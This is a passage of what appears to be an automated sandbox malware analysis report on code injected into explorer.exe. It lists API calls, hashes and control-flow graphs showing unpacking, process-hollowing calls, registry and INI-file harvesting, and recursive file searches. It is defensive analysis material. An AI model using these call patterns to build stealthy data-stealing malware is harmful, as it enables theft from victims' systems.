                                                                                                                                                                                                              • _allmul.NTDLL(?,00000000,?), ref: 027A2174
                                                                                                                                                                                                              • _allmul.NTDLL(?,?,?,00000000), ref: 027A220E
                                                                                                                                                                                                              • _allmul.NTDLL(?,00000000,00000000,?), ref: 027A2241
                                                                                                                                                                                                              • _allmul.NTDLL(02792E26,00000000,?,?), ref: 027A2295
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _allmul
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4029198491-0
                                                                                                                                                                                                              • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                                                                                              • Instruction ID: e73522ffcbeeed5111d7b8bf49a272a0cac281b47c434b041ec037d3829cc76a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12A18E707087019FDB15DF64C8A4A2FB7E6AFC8724F404A2DFA559B291EB70EC458B42
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1297977491-0
                                                                                                                                                                                                              • Opcode ID: a651741c4588cb1192251227ca51bc8d53f7b5756997ed564d8c5622edf68708
                                                                                                                                                                                                              • Instruction ID: 18424aee0a1653f8adb1d73f36fa03a908619f9ff4e707680a7c702f1635cbb1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a651741c4588cb1192251227ca51bc8d53f7b5756997ed564d8c5622edf68708
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0581AF716093149FC754DF28C894A2BBBE6FFC8724F444A6DF88A97251E770E904CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,00000000,02792783), ref: 0279192B
                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,00000000,02792783), ref: 02791930
                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02791946
                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0279194A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000011.00000002.2248826893.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcatlstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1475610065-0
                                                                                                                                                                                                              • Opcode ID: b7892c2a76ea73bcc50bb496fe3162694a33bdd725b4ab1e102acc4c6963c680
                                                                                                                                                                                                              • Instruction ID: f09a89201af99a709403a326b92341f5fc73f75d31536d2959facb07d19c45a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7892c2a76ea73bcc50bb496fe3162694a33bdd725b4ab1e102acc4c6963c680
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FE022A270031D2F0E2172AE6C84E3B77ECCAD90A130A0035FA08C3202EE62AC1186B0

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:21.6%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:87.3%
                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                              Total number of Nodes:181
                                                                                                                                                                                                              Total number of Limit Nodes:17
                                                                                                                                                                                                              execution_graph 1128 19a1f9 1129 19a228 1128->1129 1131 19a248 1128->1131 1132 19a298 1129->1132 1137 19a29d 1132->1137 1133 19a385 LoadLibraryA 1133->1137 1135 19a3e0 VirtualProtect VirtualProtect 1136 19a46e 1135->1136 1136->1136 1137->1133 1137->1135 1138 19a3d5 1137->1138 1138->1131 941 19a298 946 19a29d 941->946 942 19a385 LoadLibraryA 942->946 944 19a3e0 VirtualProtect VirtualProtect 945 19a46e 944->945 945->945 946->942 946->944 947 19a3d5 946->947 996 193608 1001 193458 StrStrIW 996->1001 999 193458 17 API calls 1000 19365d 999->1000 1002 19348f 1001->1002 1003 19350f 1001->1003 1026 192774 1002->1026 1005 193523 RegOpenKeyExW 1003->1005 1006 1935e4 1005->1006 1012 19354d 1005->1012 1007 191860 RtlFreeHeap 1006->1007 1010 1935f7 1007->1010 1008 1935b5 RegEnumKeyExW 1008->1006 1008->1012 1009 1934a8 1009->1003 1011 193507 1009->1011 1039 1928a0 1009->1039 1010->999 1013 191860 RtlFreeHeap 1011->1013 1012->1008 1015 192700 RtlFreeHeap 1012->1015 1018 193458 14 API calls 1012->1018 1022 191860 RtlFreeHeap 1012->1022 1013->1003 1015->1012 1017 1934fa 1019 191860 RtlFreeHeap 1017->1019 1018->1012 1019->1011 1022->1012 1025 191860 RtlFreeHeap 1025->1017 1027 192793 1026->1027 1028 192797 RegOpenKeyExW 1026->1028 1027->1028 1029 19286b 1028->1029 1030 1927d5 RegQueryValueExW 1028->1030 1031 19288d 1029->1031 1033 192774 RtlFreeHeap 1029->1033 1032 19285b RegCloseKey 1030->1032 1034 1927fe 1030->1034 1031->1009 1032->1029 1032->1031 1033->1031 1034->1032 1035 19281a RegQueryValueExW 1034->1035 1036 192851 1035->1036 1037 192844 1035->1037 1038 191860 RtlFreeHeap 1036->1038 1037->1032 1038->1037 1040 1928b9 1039->1040 1041 192922 1040->1041 1042 191860 RtlFreeHeap 1040->1042 1041->1017 1045 192700 1041->1045 1044 1928df 1042->1044 1043 192774 5 API calls 1043->1044 1044->1041 1044->1043 1046 192712 1045->1046 1047 191860 RtlFreeHeap 1046->1047 1048 19271d 1047->1048 1048->1017 1049 193254 1048->1049 1073 19298c 1049->1073 1052 19343a 1052->1025 1053 19298c GetFileAttributesW 1056 193295 1053->1056 1054 19342c 1082 1930a8 1054->1082 1056->1052 1056->1054 1077 192938 1056->1077 1059 19340c 1061 191860 RtlFreeHeap 1059->1061 1060 193304 GetPrivateProfileSectionNamesW 1060->1059 1071 19331e 1060->1071 1062 193414 1061->1062 1063 191860 RtlFreeHeap 1062->1063 1064 19341c 1063->1064 1065 191860 RtlFreeHeap 1064->1065 1067 193424 1065->1067 1066 19334e GetPrivateProfileStringW 1068 193379 GetPrivateProfileIntW 1066->1068 1066->1071 1069 191860 RtlFreeHeap 1067->1069 1068->1071 1069->1054 1070 1930a8 RtlFreeHeap FindFirstFileW FindNextFileW FindClose 1070->1071 1071->1059 1071->1066 1071->1070 1072 191860 RtlFreeHeap 1071->1072 1072->1071 1074 192999 1073->1074 1076 1929a9 1073->1076 1075 19299e GetFileAttributesW 1074->1075 1074->1076 1075->1076 1076->1052 1076->1053 1078 192945 1077->1078 1079 192980 1077->1079 1078->1079 1080 19294a CreateFileW 1078->1080 1079->1059 1079->1060 1080->1079 1081 192972 CloseHandle 1080->1081 1081->1079 1083 1930cc 1082->1083 1084 1930f1 FindFirstFileW 1083->1084 1085 193237 1084->1085 1089 193117 1084->1089 1086 191860 RtlFreeHeap 1085->1086 1087 19323f 1086->1087 1088 191860 RtlFreeHeap 1087->1088 1090 193247 1088->1090 1091 193210 FindNextFileW 1089->1091 1093 191860 RtlFreeHeap 1089->1093 1095 192700 RtlFreeHeap 1089->1095 1096 1930a8 RtlFreeHeap 1089->1096 1097 191860 RtlFreeHeap 1089->1097 1098 192f7c 1089->1098 1090->1052 1091->1089 1092 193226 FindClose 1091->1092 1092->1085 1093->1091 1095->1089 1096->1089 1097->1089 1108 192bc0 1098->1108 1101 193086 1101->1089 1103 19307e 1104 191860 RtlFreeHeap 1103->1104 1104->1101 1105 192e04 RtlFreeHeap 1107 192fb6 1105->1107 1106 191860 RtlFreeHeap 1106->1107 1107->1101 1107->1103 1107->1105 1107->1106 1109 192bf3 1108->1109 1110 192700 RtlFreeHeap 1109->1110 1111 192c54 1110->1111 1112 192a54 RtlFreeHeap 1111->1112 1113 192c68 1112->1113 1114 192c7e 1113->1114 1115 191860 RtlFreeHeap 1113->1115 1116 191860 RtlFreeHeap 1114->1116 1115->1114 1122 192cb2 1116->1122 1117 192da3 1118 191860 RtlFreeHeap 1117->1118 1119 192dd9 1118->1119 1120 191860 RtlFreeHeap 1119->1120 1121 192de1 1120->1121 1121->1101 1124 192a54 1121->1124 1122->1117 1123 191860 RtlFreeHeap 1122->1123 1123->1117 1126 192a86 1124->1126 1125 192ad9 1125->1107 1126->1125 1127 191860 RtlFreeHeap 1126->1127 1127->1125 1139 193668 1140 193458 17 API calls 1139->1140 1141 19369b 1140->1141 1142 193458 17 API calls 1141->1142 1143 1936bd 1142->1143 1144 19a1af 1145 19a1bd 1144->1145 1146 19a298 3 API calls 1145->1146 1147 19a1cf 1145->1147 1146->1147 1148 19a1e0 1149 19a1e6 1148->1149 1150 19a298 3 API calls 1149->1150 1151 19a248 1150->1151 948 1937f4 949 193804 948->949 956 19372c 949->956 953 19387c 954 193817 954->953 966 1936c8 954->966 957 19375a 956->957 958 193777 RegCreateKeyExW 957->958 959 1937bc RegCloseKey 958->959 960 1937cd 958->960 959->960 974 191860 960->974 963 1922b4 964 1922c8 CreateStreamOnHGlobal 963->964 965 1922d6 963->965 964->965 965->954 967 1936cd 966->967 972 19371e 966->972 968 193716 967->968 978 1921e4 967->978 970 191860 RtlFreeHeap 968->970 970->972 971 193706 973 191860 RtlFreeHeap 971->973 972->953 973->968 975 19186e 974->975 976 191886 975->976 977 191878 RtlFreeHeap 975->977 976->953 976->963 977->976 979 19220b 978->979 984 191e20 979->984 982 191860 RtlFreeHeap 983 192297 982->983 983->971 994 191e6d 984->994 985 1921b5 986 191860 RtlFreeHeap 985->986 987 1921cb 986->987 987->982 988 19219b 988->985 989 191860 RtlFreeHeap 988->989 989->985 990 192177 991 191860 RtlFreeHeap 990->991 992 19218e 991->992 992->988 993 191860 RtlFreeHeap 992->993 993->988 994->985 994->988 994->990 995 191860 RtlFreeHeap 994->995 995->990

                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                              callgraph 0 Function_0019A298 50 Function_0019A25A 0->50 1 Function_00192498 39 Function_001923AC 1->39 64 Function_00192340 1->64 2 Function_0019141D 3 Function_0019971C 4 Function_0019B111 5 Function_00192610 28 Function_00191838 5->28 6 Function_00192410 6->39 74 Function_001923F0 6->74 7 Function_00191D10 7->28 70 Function_001918F8 7->70 8 Function_00199912 9 Function_00199C92 10 Function_00192514 43 Function_001923A0 10->43 54 Function_00192354 10->54 61 Function_0019234C 10->61 10->74 88 Function_00192360 10->88 11 Function_00191B14 11->28 12 Function_00193608 48 Function_00193458 12->48 13 Function_00192688 13->28 14 Function_00192308 15 Function_00191508 16 Function_0019B00C 17 Function_0019298C 18 Function_00191B8C 18->28 19 Function_0019188C 19->28 20 Function_0019B181 21 Function_00191980 22 Function_00191000 23 Function_00192700 23->13 85 Function_00191860 23->85 24 Function_00194082 25 Function_00191405 26 Function_00192E04 26->18 26->28 26->85 27 Function_00192938 29 Function_00191938 30 Function_00199930 31 Function_001938B0 31->28 31->31 55 Function_00191AD4 31->55 32 Function_001914B2 33 Function_00199EB4 34 Function_001922B4 35 Function_001941A9 36 Function_001930A8 36->13 36->23 36->36 40 Function_0019272C 36->40 71 Function_00192AF8 36->71 73 Function_00192F7C 36->73 36->85 37 Function_0019372C 37->28 37->85 38 Function_001922AC 41 Function_0019A1AF 41->0 42 Function_001928A0 42->28 76 Function_00192774 42->76 42->85 44 Function_00191E20 44->7 44->19 44->21 44->28 51 Function_001918D0 44->51 63 Function_00191C40 44->63 44->70 44->85 86 Function_00191DE0 44->86 45 Function_00191822 46 Function_001999A7 47 Function_001947A7 48->13 48->23 48->28 48->42 48->48 53 Function_00193254 48->53 65 Function_001929C0 48->65 48->76 48->85 49 Function_00199ADA 52 Function_0019A055 53->13 53->17 53->27 53->28 53->36 53->40 53->85 56 Function_001914D4 57 Function_00191254 58 Function_00192A54 58->28 58->85 59 Function_001936C8 59->11 79 Function_001918E8 59->79 59->85 89 Function_001921E4 59->89 60 Function_00194048 62 Function_00191A4C 65->13 66 Function_00192BC0 66->5 66->13 66->23 66->28 66->29 66->40 66->58 66->85 67 Function_00199FC2 68 Function_0019A1F9 68->0 69 Function_001914F9 71->28 72 Function_00192EF8 72->5 73->26 73->58 73->66 73->72 73->85 74->39 75 Function_00192570 75->28 75->43 75->54 76->28 76->76 76->85 77 Function_001937F4 77->14 77->34 77->37 77->38 77->54 77->59 77->75 80 Function_001922E8 77->80 83 Function_00192B6C 77->83 78 Function_00191576 81 Function_00193668 81->48 82 Function_0019156C 83->1 83->10 84 Function_0019A1E0 84->0 85->55 86->62 87 Function_00191560 89->28 89->44 89->85

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 184 1930a8-1930e3 call 192688 call 19272c 189 1930ec-193111 call 192688 FindFirstFileW 184->189 190 1930e5-1930e6 184->190 193 193237-193252 call 191860 * 2 189->193 194 193117-193118 189->194 190->189 195 19311f-193124 194->195 197 19312a-19313e 195->197 198 1931ad-1931df call 192688 call 192700 195->198 205 193210-193220 FindNextFileW 197->205 206 193144-193158 197->206 214 193208-19320b call 191860 198->214 215 1931e1-1931eb call 192af8 198->215 205->195 208 193226-193230 FindClose 205->208 206->205 211 19315e-19316b call 19272c 206->211 208->193 219 19316d-193174 211->219 220 193176 211->220 214->205 215->214 223 1931ed-193203 call 192f7c 215->223 222 193178-1931a8 call 192688 call 192700 call 1930a8 call 191860 219->222 220->222 222->198 223->214
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_191000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3541575487-0
                                                                                                                                                                                                              • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                                                                                                              • Instruction ID: a118164f0d8dda437dde0cb6da1c0d43d48d2c94ca3894313943429f33e82582
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40417130318B4D5FDF98FB3898597AA73D2FBE8340F444A29A45AC3195EF78D9048782

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 239 1938b0-193907 call 191ad4 call 191838 NtUnmapViewOfSection call 19388c 248 193909-19390c call 1938b0 239->248 249 193911-19391a 239->249 248->249
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL ref: 001938F2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_191000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: SectionUnmapView
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 498011366-0
                                                                                                                                                                                                              • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                                                                                                              • Instruction ID: ffe50e77ae542e390fe63fcc883ae872afac61933e34ad064f63f81f3b734d4f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BAF0E524F11A091BEF6C77FD685D3382290EB68314F900629B525C32E2DE398E868302

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE ref: 001927C7
                                                                                                                                                                                                              • RegQueryValueExW.KERNELBASE ref: 001927F4
                                                                                                                                                                                                              • RegQueryValueExW.KERNELBASE ref: 0019283A
                                                                                                                                                                                                              • RegCloseKey.KERNELBASE ref: 00192860
                                                                                                                                                                                                                • Part of subcall function 00191860: RtlFreeHeap.NTDLL ref: 00191880
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_191000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryValue$CloseFreeHeapOpen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1641618270-0
                                                                                                                                                                                                              • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                                                                                                              • Instruction ID: 1b768874c174c82d1c167c2c69666b84cbc8b7aabefa14be5fd04485af0264df
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D31B63020CB499FEB68DB28D45877A7BD4FBE8355F54062EE49AC3265DF34C8468742

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 22 19372c-1937ba call 191838 RegCreateKeyExW 26 1937bc-1937cb RegCloseKey 22->26 27 1937d6-1937f0 call 191860 22->27 26->27 28 1937cd-1937d3 26->28 28->27
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_191000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCreate
                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                              • API String ID: 2932200918-1684325040
                                                                                                                                                                                                              • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                                                                                                              • Instruction ID: 417e2500c3ce7a6ea4945b80db7a3e89e45073146300812cfd667e7d297a25b4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B911B270618B4C8FD754DF69D48866AB7E1FB98345F40062EE49AC3320DF38D985CB82

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 31 19a298-19a29b 32 19a2a5-19a2a9 31->32 33 19a2ab-19a2b3 32->33 34 19a2b5 32->34 33->34 35 19a29d-19a2a3 34->35 36 19a2b7 34->36 35->32 37 19a2ba-19a2c1 36->37 39 19a2cd 37->39 40 19a2c3-19a2cb 37->40 39->37 41 19a2cf-19a2d2 39->41 40->39 42 19a2d4-19a2e2 41->42 43 19a2e7-19a2f4 41->43 44 19a31e-19a339 42->44 45 19a2e4-19a2e5 42->45 53 19a30e-19a31c call 19a25a 43->53 54 19a2f6-19a2f8 43->54 46 19a36a-19a36d 44->46 45->43 48 19a36f-19a370 46->48 49 19a372-19a379 46->49 51 19a351-19a355 48->51 52 19a37f-19a383 49->52 55 19a33b-19a33e 51->55 56 19a357-19a35a 51->56 57 19a3e0-19a3e9 52->57 58 19a385-19a39e LoadLibraryA 52->58 53->32 59 19a2fb-19a302 54->59 55->49 64 19a340 55->64 56->49 60 19a35c-19a360 56->60 61 19a3ec-19a3f5 57->61 63 19a39f-19a3a6 58->63 79 19a30c 59->79 80 19a304-19a30a 59->80 65 19a341-19a345 60->65 66 19a362-19a369 60->66 67 19a41a-19a46a VirtualProtect * 2 61->67 68 19a3f7-19a3f9 61->68 63->52 70 19a3a8 63->70 64->65 65->51 77 19a347-19a349 65->77 66->46 74 19a46e-19a473 67->74 72 19a3fb-19a40a 68->72 73 19a40c-19a418 68->73 75 19a3aa-19a3b2 70->75 76 19a3b4-19a3bc 70->76 72->61 73->72 74->74 81 19a475-19a484 74->81 82 19a3be-19a3ca 75->82 76->82 77->51 78 19a34b-19a34f 77->78 78->51 78->56 79->53 79->59 80->79 85 19a3cc-19a3d3 82->85 86 19a3d5-19a3df 82->86 85->63
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE ref: 0019A397
                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0019A441
                                                                                                                                                                                                              • VirtualProtect.KERNELBASE ref: 0019A45F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000012.00000002.2219790924.0000000000199000.00000040.80000000.00040000.00000000.sdmp, Offset: 00199000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_199000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 895956442-0
                                                                                                                                                                                                              • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                                                                                                              • Instruction ID: ee9c6ed0ef3919c0b562a5841b3ed0485e0f9a6ee3946cfd32e19fc8320d504e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E51783235891D4BCF24AB789CC42F4B7D1FF59325BA8062AC09AC3284DB59D94E83C3

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 87 193254-193287 call 19298c 90 19343a-193456 87->90 91 19328d-193297 call 19298c 87->91 91->90 94 19329d-1932aa call 19272c 91->94 97 1932ac-1932b3 94->97 98 1932b5 94->98 99 1932b7-1932c2 call 192688 97->99 98->99 102 1932c8-1932fe call 192688 call 191838 * 2 call 192938 99->102 103 19342c-193435 call 1930a8 99->103 113 19340c-193427 call 191860 * 4 102->113 114 193304-193318 GetPrivateProfileSectionNamesW 102->114 103->90 113->103 114->113 116 19331e-193326 114->116 116->113 117 19332c-19332f 116->117 117->113 119 193335-193348 117->119 124 19334e-193377 GetPrivateProfileStringW 119->124 125 1933f0-193406 119->125 124->125 127 193379-193398 GetPrivateProfileIntW 124->127 125->113 125->117 130 19339a-1933ad call 192688 127->130 131 1933e5-1933eb call 1930a8 127->131 135 1933af-1933b3 130->135 136 1933c6-1933e3 call 1930a8 call 191860 130->136 131->125 137 1933bd-1933c4 135->137 138 1933b5-1933ba 135->138 136->125 137->135 137->136 138->137
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0019298C: GetFileAttributesW.KERNELBASE ref: 0019299E
                                                                                                                                                                                                              • GetPrivateProfileSectionNamesW.KERNEL32 ref: 0019330F
                                                                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32 ref: 0019336F
                                                                                                                                                                                                              • GetPrivateProfileIntW.KERNEL32 ref: 0019338C
                                                                                                                                                                                                                • Part of subcall function 001930A8: FindFirstFileW.KERNELBASE ref: 00193104
                                                                                                                                                                                                                • Part of subcall function 00191860: RtlFreeHeap.NTDLL ref: 00191880
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_191000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 970345848-0
                                                                                                                                                                                                              • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                                                                                                              • Instruction ID: a04b7f48c8e3f9b2e1086c3519f2f3292c331b54d25ca1890a34149f688f6f07
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A51B730728F094FEF59BB2C985667972D2FBA8340B44056DE41AC3296EF64DE428386

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIW.KERNELBASE ref: 0019347E
                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE ref: 0019353F
                                                                                                                                                                                                              • RegEnumKeyExW.KERNELBASE ref: 001935D6
                                                                                                                                                                                                                • Part of subcall function 00192774: RegOpenKeyExW.KERNELBASE ref: 001927C7
                                                                                                                                                                                                                • Part of subcall function 00192774: RegQueryValueExW.KERNELBASE ref: 001927F4
                                                                                                                                                                                                                • Part of subcall function 00192774: RegQueryValueExW.KERNELBASE ref: 0019283A
                                                                                                                                                                                                                • Part of subcall function 00192774: RegCloseKey.KERNELBASE ref: 00192860
                                                                                                                                                                                                                • Part of subcall function 00193254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 0019330F
                                                                                                                                                                                                                • Part of subcall function 00191860: RtlFreeHeap.NTDLL ref: 00191880
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_191000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1841478724-0
                                                                                                                                                                                                              • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                                                                                                              • Instruction ID: d5cf65f3a830936643f5b07f20d336f84c25b66b1f4d7b0e9b3ae49a3eeba4cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF416A30718B094FDF98EF6D849972AB6E2FBAC340F01496EA04EC3261DF34D9458B42

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 232 192938-192943 233 192945-192948 232->233 234 192984 232->234 233->234 235 19294a-192970 CreateFileW 233->235 236 192986-19298b 234->236 237 192980-192982 235->237 238 192972-19297a CloseHandle 235->238 237->236 238->237
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_191000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCreateFileHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3498533004-0
                                                                                                                                                                                                              • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                                                                                                              • Instruction ID: fb5bc17cbf33c73076805367d96850c0818297b181fe73cae1cf891fbe22ef9b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
